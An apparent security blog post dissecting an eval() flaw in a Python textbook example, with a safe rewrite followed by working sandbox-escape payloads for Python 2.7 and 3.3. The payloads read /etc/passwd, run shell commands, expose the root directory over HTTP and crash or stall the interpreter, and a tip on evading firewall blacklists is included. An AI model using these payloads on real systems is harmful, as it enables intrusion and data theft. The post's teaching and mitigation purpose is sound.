If you are only interested in the exploitation part, scroll down to “Exploiting”.
I’m reading the following book right now:
Programming Python, Fourth Edition, by Mark Lutz (O’Reilly). Copyright 2011 Mark Lutz, 978-0-596-15810-1
Example 1-22 on page 38/39 reads as follows:
me$ cd PP4E/Preview/
me$ cat peopleinteract_update.py
# interactive updates
import shelve
from person import Person
fieldnames = ('name', 'age', 'job', 'pay')

db = shelve.open('class-shelve')
while True:
    key = input('\nKey? => ')
    if not key: break
    if key in db:
        record = db[key]                      # update existing record
    else:                                     # or make/store new rec
        record = Person(name='?', age='?')    # eval: quote strings
    for field in fieldnames:
        currval = getattr(record, field)
        newtext = input('\t[%s]=%s\n\t\tnew?=>' % (field, currval))
        if newtext:
            setattr(record, field, eval(newtext))
    db[key] = record
db.close()
Of course I saw that “eval”, so I immediately stopped reading the book and started reading about how I could exploit this little Python program. The book doesn’t mention that this example could be a security problem, but it looks like they wanted to add a comment, because on page 49 it reads:
As mentioned previously, this is potentially dangerous if someone sneaks some malicious code into our shelve, but we’ll finesse such concerns for now.
In my opinion it would be better to show a programmer how easy it is to specify a whitelist of characters (e.g. a-zA-Z0-9 and the single quote). From a security perspective, incorrect or insufficient input filtering is very dangerous. Although missing filtering is usually not the root cause, input filtering can help to prevent buffer overflows, XSS, SQL injection and most other injections. Whitelisting in Python would be done as follows:
import string
whitelist = string.ascii_letters + string.digits + "' "
newtext = ''.join(c for c in newtext if c in whitelist)
Of course this whitelist would not cover Unicode characters. So the filter could be loosened to also let through every non-ASCII character (code point above 127). For those characters it behaves more like a blacklist than a whitelist, but it should still be pretty safe (although blacklists are bad practice):
import string
whitelist = string.ascii_letters + string.digits + "' "
newtext = ''.join(c for c in newtext if c in whitelist or ord(c) > 127)
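To see what such a filter does to an injection attempt, here is a minimal sketch that wraps it in a function. The helper name `filter_input`, its `allow_non_ascii` switch and the sample payload are assumptions made for illustration; they are not part of the book's example.

```python
import string

# Allowed characters: ASCII letters, digits, the single quote and the space.
WHITELIST = string.ascii_letters + string.digits + "' "

def filter_input(text, allow_non_ascii=False):
    """Drop every character that is not whitelisted (hypothetical helper)."""
    return ''.join(
        c for c in text
        if c in WHITELIST or (allow_non_ascii and ord(c) > 127)
    )

payload = "__import__('os').system('id')"
filtered = filter_input(payload)
print(filtered)  # import'os'system'id'
```

Without underscores, dots and parentheses the filtered string is no longer a valid expression, so eval would raise a SyntaxError instead of running a command.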
Of course this is just a workaround; the proper solution is not to use the eval function at all. Instead, all input should be treated as strings, and only the integer fields (age and pay) should be parsed to integers. The following code is the proper solution for the above example:
me$ cd PP4E/Preview/
me$ cat peopleinteract_update.py
# interactive updates
import shelve
from person import Person
fieldnames = ('name', 'age', 'job', 'pay')
numerical_fieldnames = ('age', 'pay')

db = shelve.open('class-shelve')
while True:
    key = input('\nKey? => ')                 # Python 3: input() returns a plain string
    if not key: break
    if key in db:
        record = db[key]                      # update existing record
    else:                                     # or make/store new rec
        record = Person(name='?', age='?')
    for field in fieldnames:
        currval = getattr(record, field)
        newtext = input('\t[%s]=%s\n\t\tnew?=>' % (field, currval))
        if newtext:                           # empty input keeps the current value
            if field in numerical_fieldnames:
                newtext = int(newtext)        # raises ValueError on non-numeric input
            setattr(record, field, newtext)
    db[key] = record
db.close()
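The conversion step can also be isolated so that it is testable without the shelve or any console input. This is only a sketch: the helper name `parse_field` and the convention of returning None for "keep the old value" are my assumptions, not something from the book.

```python
NUMERICAL_FIELDNAMES = ('age', 'pay')

def parse_field(field, text):
    """Return the value to store for `field`, or None to keep the old value."""
    if not text:
        return None
    if field in NUMERICAL_FIELDNAMES:
        return int(text)  # raises ValueError for anything that is not an integer
    return text           # every other field stays a plain string

print(parse_field('age', '42'))                                    # 42
print(repr(parse_field('name', "__import__('os').system('id')")))  # stored as text, never run
```

A payload typed into a numeric field ends in a ValueError, and a payload typed into a text field is simply stored as a string.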
Exploiting
So let’s talk about exploiting the first example. I soon found out that the example would be very easy to exploit. For example the exit function is interpreted by eval and the program quits:
me$ python3.3 peopleinteract_update.py

Key? => tom
    [name]=56
        new?=>exit()
me$
So I read an article about the problem. I found this little code example, which can be used to execute something on your system (Unix example):
$ python3.3 peopleinteract_update.py

Key? => tom
    [name]=56
        new?=>__import__('os').system('echo hello, I am a command execution')
hello, I am a command execution
    [age]=mgr
        new?=>
As you can see, the echo command is executed and its output is printed on the next line. I told myself that was too easy, and I wanted to exploit the program under harder circumstances. As described in that article, some people try to “secure” an eval call by overwriting Python’s __builtins__. So let’s assume the line with eval in example 1-22 looks as follows:
setattr(record, field, eval(newtext, {'__builtins__':{}}))
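A minimal sketch of what this restriction does and does not block, written for Python 3. The variable names are mine; the two expressions are the direct `__import__` call used earlier and the class-hierarchy walk that the payloads in this post rely on.

```python
restricted = {'__builtins__': {}}

# A direct use of a builtin name fails: the name lookup finds nothing.
try:
    eval("__import__('os')", restricted)
    blocked = None
except NameError as exc:
    blocked = str(exc)

# Attribute access on a literal needs no builtins at all, so the whole
# class hierarchy (and everything reachable from it) is still available.
subclasses = eval("().__class__.__bases__[0].__subclasses__()", restricted)

print(blocked)
print(len(subclasses) > 0)
```

The first eval is stopped by a NameError, while the second one happily returns every class that derives directly from object.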
Many people consider clearing the builtins a “security measure”, but as described in the article above it only makes exploitation harder, not impossible. So I wanted to try the segmentation fault technique from the article on the example. It worked well for Python 2.7:
$ python
Python 2.7.3 (default, Apr 19 2012, 00:55:09)
[GCC 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2335.15.00)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> s = """
... (lambda fc=(
...     lambda n: [
...         c for c in
...             ().__class__.__bases__[0].__subclasses__()
...             if c.__name__ == n
...         ][0]
...     ):
...     fc("function")(
...         fc("code")(
...             0,0,0,0,"KABOOM",(),(),(),"","",0,""
...         ),{}
...     )()
... )()
... """
>>> eval(s, {'__builtins__':{}})
Segmentation fault: 11
me$
But the constructor of the code object changed in Python 3. If you run the same code on Python 3.3, it complains that it needs 13 arguments:
$ python3.3
Python 3.3.0rc2 (default, Sep 9 2012, 04:29:34)
[GCC 4.2.1 Compatible Apple Clang 3.1 (tags/Apple/clang-318.0.58)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> #same s as before
...
>>> eval(s, {'__builtins__':{}})
Traceback (most recent call last):
  File "", line 1, in
  File "", line 3, in
  File "", line 11, in
TypeError: code() takes at least 13 arguments (12 given)
>>>
So because the book is about Python 3, we have to change the arguments for the code object constructor. But which arguments does it take? To find that out I started a Python 3 console and typed in the following:
>>> def foo(): pass
...
>>> help(type(foo.__code__))
We get a nice description of the constructor (__init__ method) of the code object and the message that this isn’t for the faint of heart. Fine for me. We get the following argument description for the constructor:
code(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring,
      constants, names, varnames, filename, name, firstlineno,
      lnotab[, freevars[, cellvars]])
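To get a feeling for what these constructor arguments mean, one can look at the matching `co_` attributes of an ordinary function's code object. This is just an illustrative sketch with a made-up function `foo`; the exact constructor signature differs between Python versions, so only read-only attributes are inspected here.

```python
def foo(a, b=1, *, c=2):
    total = a + b + c
    return total

code = foo.__code__
print(code.co_argcount)        # 2: positional parameters a and b
print(code.co_kwonlyargcount)  # 1: keyword-only parameter c
print(code.co_nlocals)         # 4: a, b, c and total
print(code.co_varnames)        # ('a', 'b', 'c', 'total')
print(code.co_name, code.co_filename, code.co_firstlineno)
```

The segfault payload passes zeros and empty tuples for all of these and a bogus byte string as the bytecode.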
There is no “kwonlyargcount” for Python 2.7, so with an additional 0 in the argument list and specifying two literals as “bytes” instead of “strings”, we get a Python 3 segmentation fault:
s = """
(lambda fc=(
    lambda n: [
        c for c in
            ().__class__.__bases__[0].__subclasses__()
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(
            0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""
        ),{}
    )()
)()
"""
eval(s, {'__builtins__':{}})
Now of course we want to feed it to the example program. So, removing the newlines and replacing the three double quotes with one single quote, we get:
s = '(lambda fc=( lambda n: [ c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()'
eval(s, {'__builtins__':{}})
Ok, those two lines still work fine on the interactive Python 3 shell (and by removing one of the first 0 arguments for the code init method it will also work in Python 2.7). Can we exploit the test application now? Yes we can:
me$ python3.3 peopleinteract_update.py

Key? => abc
    [name]=?
        new?=>(lambda fc=( lambda n: [ c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()
Segmentation fault: 11
me$
Ok, seg faulting is fine, but what about executing real code? For that we have to go a little bit back. First, let’s try again in Python 2.7 with the cool trick described in an article on reddit. If we run the following code in a python interactive interpreter, it will show us the help page (of the help command itself):
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['help'](__builtins__['help'])
)()
"""
eval(s, {'__builtins__':{}})
So let’s see the builtins we get back with this method:
>>> a = [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__.keys()
>>> a.sort()
>>> a
['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
For example we can now print something:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
)()
"""
eval(s, {'__builtins__':{}})
We can also exit the interpreter from within the eval:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['exit']()
)()
"""
eval(s, {'__builtins__':{}})
We can also delay the answer of the interpreter (takes about 10 seconds on my machine):
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['sum'](__builtins__['xrange'](-999999999,99999999))
)()
"""
eval(s, {'__builtins__':{}})
Of course if you add some more 9s to those numbers, you can DoS the interpreter.
But if we try to read a file, the restricted mode gets hit on my machine. It seems the restricted mode is “entered when the builtins in main_dict are not the same as the interpreter’s builtins”. Here’s the corresponding code:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['file']('/etc/passwd').read())
)()
"""
eval(s, {'__builtins__':{}})
The console answers with:
Traceback (most recent call last):
  File "", line 1, in
  File "", line 2, in
  File "", line 3, in
IOError: file() constructor not accessible in restricted mode
Hmm, ok. Strange, because we can execute commands on the system:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['__import__']('os').system('cat /etc/passwd'))
)()
"""
eval(s, {'__builtins__':{}})
So I don’t really care whether I can read files on the system; I would simply execute a reverse shell if this were an exploitable web service. My next try was the subprocess module, but no luck:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['__import__']('subprocess').Popen('cat /etc/passwd', shell=True))
)()
"""
eval(s, {'__builtins__':{}})
Traceback (most recent call last):
  File "", line 1, in
  File "", line 2, in
  File "", line 3, in
RuntimeError: cannot unmarshal code objects in restricted execution mode
Ok, so no subprocesses and no reading of files. Let’s simply do some cool stuff with os.system, like showing /etc/passwd above. Let’s start an HTTP server which serves a directory listing of the root directory on port 8000:
s = """
(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):
    __builtins__['print'](__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
)()
"""
eval(s, {'__builtins__':{}})
I guess it is pretty clear that from this point on we would have control over the machine that runs the eval. Here are the payloads (in several different versions) as one-liners for Python 2.7. The file, open and fileinput payloads fail with the restricted-mode IOError when the builtins are different. os.popen fails with a permission denied for me, most likely because the payload passes /etc/passwd itself as the command to execute. The rest works on my machine:
print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
exit()
sum(xrange(-999999999,99999999))
file('/etc/passwd').read()
open('/etc/passwd').read()
__import__('fileinput').input('/etc/passwd')
__import__('os').system('cat /etc/passwd')
__import__('os').popen('/etc/passwd', 'r').read()
__import__('os').system('cd /; python -m SimpleHTTPServer')
print(file('/etc/passwd').read())
print(open('/etc/passwd').read())
print(__import__('fileinput').input('/etc/passwd'))
print(__import__('os').system('cat /etc/passwd'))
print(__import__('os').popen('/etc/passwd', 'r').read())
print(__import__('os').system('cd /; python -m SimpleHTTPServer'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
Ok, what about Python 3 now? I haven’t found a reliable way to restore the builtins on Python 3. The following code is taken from Reddit and should work in general:
lookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0]
try:
    lookup('Codec')().decode('')
except lookup('BaseException') as e:
    del lookup
    __builtins__ = e.__traceback__.tb_next.tb_frame.f_globals['__builtins__']
But because try/except is a statement and eval only accepts a single expression (SyntaxError: invalid syntax at the try), this technique can’t be used:
s = """try:
    int("a")
except:
    print(123)
"""
eval(s, {'__builtins__':{}})
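The difference between expressions and statements can be checked quickly. The following sketch (variable names are mine) feeds the same try/except source to eval and, only for contrast, to exec; it also shows that a multi-line string is fine for eval as long as it is a single expression.

```python
source = 'try:\n    int("a")\nexcept Exception:\n    result = 123\n'

# eval() compiles its argument as one expression, so a statement is rejected.
try:
    eval(source, {'__builtins__': {}})
    eval_error = None
except SyntaxError as exc:
    eval_error = exc

# exec() accepts statements; it is used here only to show the contrast.
namespace = {}
exec(source, namespace)

print(type(eval_error).__name__)  # SyntaxError
print(namespace['result'])        # 123
print(eval("(1 +\n 2)"))          # 3
```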
So we would have to find another way to restore the builtins or we have to properly build a code object like we did for the segmentation fault above. I guess another thing for my TODO list.
UPDATE 19th Feb 2013:
Talked to Ned, he wrote a nice script to find builtins. And here we go for python 3.3:
>>> x = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('aaaa')"
>>> eval(x, {'__builtins__':{}})
aaaa
>>>
So the payloads for Python 3 are as follows. Compared to the Python 2.7 list, xrange becomes range and SimpleHTTPServer becomes http.server. file() no longer exists in Python 3, so the file payloads are only kept for completeness:
print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
exit()
sum(range(-999999999,99999999))
file('/etc/passwd').read()
open('/etc/passwd').read()
__import__('fileinput').input('/etc/passwd')
__import__('os').system('cat /etc/passwd')
__import__('os').popen('/etc/passwd', 'r').read()
__import__('os').system('cd /; python3 -m http.server')
print(file('/etc/passwd').read())
print(open('/etc/passwd').read())
print(__import__('fileinput').input('/etc/passwd'))
print(__import__('os').system('cat /etc/passwd'))
print(__import__('os').popen('/etc/passwd', 'r').read())
print(__import__('os').system('cd /; python3 -m http.server'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['exit']()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['range'](-999999999,99999999))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python3 -m http.server')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python3 -m http.server'))
Of course, now that you have Ned’s script, you can easily find other places where the builtins live; Pattern is just one example. That helps, for example, if one of these strings ever gets blacklisted (think web application firewall).
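The idea behind such a search can be sketched in a few lines of Python 3. To be clear, this is not Ned’s script; it is my own minimal approximation, and the function name `find_builtins_holders` is made up. It lists the direct subclasses of object whose `__init__` is a Python function, because such a function carries its module globals (and with them `__builtins__`) in `__globals__`.

```python
def find_builtins_holders():
    """Names of loaded classes whose __init__.__globals__ exposes __builtins__."""
    holders, seen = [], set()
    for cls in object.__subclasses__():
        if cls.__name__ in seen:
            continue  # a payload's [0] lookup would only hit the first class by name
        seen.add(cls.__name__)
        init_globals = getattr(cls.__init__, '__globals__', None)
        if isinstance(init_globals, dict) and '__builtins__' in init_globals:
            holders.append(cls.__name__)
    return sorted(holders)

holders = find_builtins_holders()
print(len(holders), holders[:5])

# Build a payload in the style used above and run it with cleared builtins.
payload = (
    "[x for x in (1).__class__.__base__.__subclasses__() "
    "if x.__name__ == %r][0].__init__.__globals__['__builtins__']" % holders[0]
)
recovered = eval(payload, {'__builtins__': {}})
# Depending on the defining module, __builtins__ is a dict or the module itself.
builtins_dict = recovered if isinstance(recovered, dict) else vars(recovered)
print('print' in builtins_dict)
```

Which class names show up depends on the Python version and on the modules that happen to be imported, so a name that works on one target may be missing on another.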
Wonderful! Thank you very much for this article! I got some new Python exploitation tricks 🙂
nice article ! thank you very much.
Great article! Thank you!
The Python module evalidate (pip3 install evalidate) solves this problem.
It parses untrusted user code into an Abstract Syntax Tree (AST) and checks each node. The code is then evaluated only if it consists solely of safe nodes. Example:
>>> evalidate.safeeval('a+1', {'a':100})
(True, 101)
>>> evalidate.safeeval("os.system('clear')", {'a':100})
(False, 'Validation error: Operaton type Call is not allowed')
Disclaimer: I’m the author of this module.
I’d like to emphasise that I did not check your library for security issues, and I’m not recommending that anyone rely on any third-party library (yours included) to eval code at all. Far too many of these libraries are heavily flawed, because getting this right requires knowing a lot of Python features and internals. This is a minefield.
In most cases I think using ast.literal_eval or using a json library is totally sufficient.
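As a minimal sketch of that suggestion: ast.literal_eval accepts only Python literals (strings, numbers, tuples, lists, dicts and so on) and rejects anything that would have to be executed, and json.loads does the same job for JSON input. The sample values are made up for illustration.

```python
import ast
import json

print(ast.literal_eval("'Bob Smith'"))                    # Bob Smith
print(ast.literal_eval("42"))                             # 42
print(ast.literal_eval("{'name': 'Sue', 'pay': 50000}"))  # {'name': 'Sue', 'pay': 50000}

# A function call is not a literal, so the payload is rejected, not executed.
try:
    ast.literal_eval("__import__('os').system('id')")
    rejected = False
except (ValueError, SyntaxError):
    rejected = True
print(rejected)                                           # True

print(json.loads('{"name": "Sue", "pay": 50000}'))        # {'name': 'Sue', 'pay': 50000}
```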